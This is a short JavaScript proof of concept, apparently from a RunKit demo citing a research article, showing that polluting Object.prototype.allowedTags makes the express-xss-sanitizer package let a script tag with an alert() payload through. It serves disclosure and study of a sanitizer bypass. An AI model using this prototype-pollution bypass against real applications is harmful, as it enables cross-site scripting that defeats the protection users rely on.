//Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information
var expressXssSanitizer = require("express-xss-sanitizer");
var data = "<h1>Hi</h1><script>alert()</script>";
Object.prototype.allowedTags = ['script'];
data = expressXssSanitizer.sanitize(data, {});
console.log(data);
Created from: https://npm.runkit.com/express-xss-sanitizer